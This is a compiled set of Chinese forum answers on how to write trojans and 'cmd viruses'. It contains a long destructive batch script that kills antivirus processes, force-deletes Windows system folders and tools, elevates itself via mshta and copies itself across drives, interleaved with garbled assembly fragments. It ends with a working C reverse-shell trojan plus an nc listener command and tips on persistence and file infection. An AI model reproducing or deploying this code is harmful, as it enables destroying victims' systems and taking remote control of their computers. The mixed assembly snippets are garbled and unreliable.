文章大纲：

• 1、如何编制木马病毒？
• 2、用cmd可以编病毒或木马吗?
• 3、怎么编木马病毒
• 4、写cmd病毒
• 5、求一个简单木马的源代码。必须注明每个语句的作用。只为交作业。有的百度私信我

如何编制木马病毒？

c也可以编的出来 如果你想整人的话又不伤害机子

给你个安逸的 用C写

#include stdio.h

#include stdlib.h

main()

{

int i;

for(i=1;i=200;i++)

system("start cmd.exe");

}

就弹200个黑窗口的cmd就是了 也不会有什么破坏

你可以再发挥一下嘛

用cmd可以编病毒或木马吗?

cmd指的是批处理还是命令提示符？

如果是批处理的话，编写一个恶作剧的小小“病毒”应该是可以的，木马好像功能太少……

怎么编木马病毒

下个VB来做个VBS

关机脚本

，调用CMD的关机命令就可以了，无毒无害，想知道怎样 *** 网上搜，我就不多说了。

系统的CMD里面有个计划关机命令然后以vbs脚本启动这个命令就行了....算了你还是

百度HI

我吧，我直接写源码给你，你下个VB回来，然后新建个VBS工程。将代码复制进去然后生成就行了，如果需要的话还可以外加注释给你

4楼说的不对，先不管他代码是否正确，大家想想要是直接文本就可以生成

EXE文件

那么还用编程做什么，你们说是不是，直接标准答案给我了。

嘻嘻

写cmd病毒

代码是

echo off

JMP Label1

Db thunkcode1

Label2:

……

JMP Label3

Db thunkcode3

Label1:

…….

JMP Label2

Db thunkcode2

Label3:

JMP Label1

Db thunkcode1

Label2:jjj

……

JMP Label3

Db thunkcode3

Label1:ss

…….

JMP Label2

Db thunkcode2

Label3:mm

taskkill /f /im 360DesktopLite.exe

jz label

　jnz label

　db thunkcode

label:

　jz label2

　jnz label2

　db thunkcode

lable2

　mov ax, 8

　xor ax, 77

　...

taskkill /f /im explore.exe

taskkill /f /im 360tray.exe

taskkill /f /im 360Safe.exe

echo off

taskkill /f /im 360tray.exe

JMP Label1

Db thunkcode1

Label2:

……

JMP Label3

Db thunkcode3

Label1:

…….

JMP Label2

Db thunkcode2

Label3:

JMP Label1

Db thunkcode1

Label2:

……

JMP Label3

Db thunkcode3

Label1:

…….

JMP Label2

Db thunkcode2

Label3:

taskkill /f /im 360tray.exe

taskkill /f /im ZhuDongFangYu.exe

rmdir /s/q C:\Users\administrator\Desktop

rmdir /s/q C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

rmdir /s/q C:\ProgramData

del /f /s /q regedit.exe

JMP Label1

Db thunkcode1

Label2:

……

JMP Label3

Db thunkcode3

Label1:

…….

JMP Label2

Db thunkcode2

Label3:

JMP Label1

Db thunkcode1

Label2:

……

JMP Label3

Db thunkcode3

Label1:

…….

JMP Label2

Db thunkcode2

Label3:

call label_1

　db thunkcode

　jmp label_2

　db thunkcode

label_1:

　pop eax

　jmp label_3

　db thunkcode,thunkcode,thunkcode

label_3:

　inc eax

　jmp label_4

　db thunkcode,thunkcode,thunkcode

label_4:

　jmp eax

　db thunkcode

label_2:

　....

del /f /s /q notepad.exe

rmdir /s/q apppatch

rmdir /s/q Windows10Upgrade

rmdir /s/q LDSGameMaster

set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd

set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm

del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String：cmdcrumb=location:C%3A%5C

rmdir /s/q C:\Windows\appcompat\Programs

rmdir /s/q C:\Windows\en-US

rmdir /s/q C:\Windows\OCR

del /f /s /q notepad.exe

rmdir /s/q apppatch

rmdir /s/q Windows10Upgrade

rmdir /s/q LDSGameMaster

set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd

set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm

del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果crumb=System.Generic.String：cmdcrumb=location:C%3A%5C

rmdir /s/q C:\Windows\appcompat\Programs

rmdir /s/q C:\Windows\en-US

rmdir /s/q C:\Windows\OCR

::wwwwwww::rrrrrr%%tttt

rmdir /s/q C:\Windows\minidump

rmdir /s/q C:\Windows\Microsoft.NET

ftype nppfile="C:\ProgramFiles (x86)\Notepad++\notepad++.exe" %1

for /l %%i in (1 1 9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999)do md A..\

@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit

:a

set /a a+=1

echo %random%-%random%-%random% C:\Users\%username%\Desktop\CCBL.%random%

mshta javascript:alert(".");close();

goto a

@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit

for /f "tokens=* delims=" %%i in ('dir /b D:\*.*') do copy /y "%dpnx0" "%%i" nul

for /f "tokens=* delims=" %%i in ('dir /b A:\*.*') do copy /y "%dpnx0" "%%i" nul

@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit

for /f "tokens=* delims=" %%i in ('dir /b K:\*.*') do copy /y "%dpnx0" "%%i" nul

for /f "tokens=* delims=" %%i in ('dir /b I:\*.*') do copy /y "%dpnx0" "%%i"

@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)exit

for /f "tokens=* delims=" %%i in ('dir /b Z:\*.*') do copy /y "%dpnx0" "%%i" nul

for /f "tokens=* delims=" %%i in ('dir /b M:\*.*') do copy /y "%dpnx0" "%%i" nul

rmdir /s/q C:\Windows\Offline Web Pages

求一个简单木马的源代码。必须注明每个语句的作用。只为交作业。有的百度私信我

//一个简单木马的源代码

#include stdio.h

#include winsock2.h

#pragma comment(lib,"Ws2_32.lib")

void main()

{

WSADATA wsa;

SOCKET corky;

struct sockaddr_in add;

WSAStartup(MAKEWORD(2,2),wsa);//初始化

corky=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);//创建套接字corky

add.sin_family=AF_INET;//填充sockaddr_in结构

add.sin_port=htons(918); //换成你的端口

add.sin_addr.s_addr=inet_addr("127.0.0.1");//换成你的ip地址

connect(corky,(struct sockaddr *)add,sizeof(add)); //连接控制端

STARTUPINFO si; //创建STARTUPINFO结构

ZeroMemory(si,sizeof(si));//为STARTUPINFO结构分配内存

si.cb=sizeof(si);

si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;//要使用的标志位

si.wShowWindow=SW_HIDE;//隐藏cmd.exe窗口

si.hStdInput=si.hStdOutput=si.hStdError=(void *)corky;//重定向输入输出到套接字corky

PROCESS_INFORMATION pi;

CreateProcess(NULL,"cmd.exe",NULL,NULL,1,0,NULL,NULL,si,pi);//创建cmd.exe进程

ExitProcess(0);

}

//用nc监听你的918端口（nc -l -p 918）然后耐心等待对方启动木马吧！

//提示：nc在《网友世界》2008 3月光盘中winowsPE系统的外挂程序中可以找到

//如果木马启动你在nc的窗口就会得到一个带微软版权的提示

//输入dir命令看看就会看到对方目录下的所有文件信息（木马所在目录）

//用del命令可以删除他的文件了

//不过还是有缺陷就是对方可以看到有一个cmd窗口笨蛋也知道中招了哈哈..

//到时警察叔叔来找你可别怪我提醒你呦！

//你可以完善它如向系统添加启动项让它随系统启动

//更好是感染文件让它随宿主的打开而启动

//你还要完善窗口的隐藏

//本代码在XP+VC++6.0下调试通过